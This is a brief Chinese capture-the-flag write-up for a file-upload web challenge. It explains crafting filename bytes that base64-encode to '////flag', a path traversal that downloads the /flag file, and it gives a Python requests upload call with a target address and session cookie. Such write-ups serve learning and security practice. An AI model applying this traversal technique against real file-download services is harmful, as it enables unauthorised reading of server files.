打开之后首先是注册登录,然后可以进行文件上传。上传文件后,页面上出现文件名,并且可以通过?filename=参数下载回来,注意文件名被进行了base64编码。
提示flag文件位于/flag处,因此构造文件名(ff ff ff 7e 56 a0)使得base64编码后为////flag,这样再下载时,会直接根据绝对路径传回flag文件。网页上不太好直接操作,我这里用的python requests库。上传完成后下载对应文件可得flag。
requests.post('http://82.157.146.43:17972/upload', files={'file':open('test','rb')}, data={'filename': '\xff\xff\xff\x7e\x56\xa0'}, cookies={'session': 'eyJ1aWQiOjF9.ZTp6Nw.kWQIM2nc13hHOf4naTWzopZQRVc'})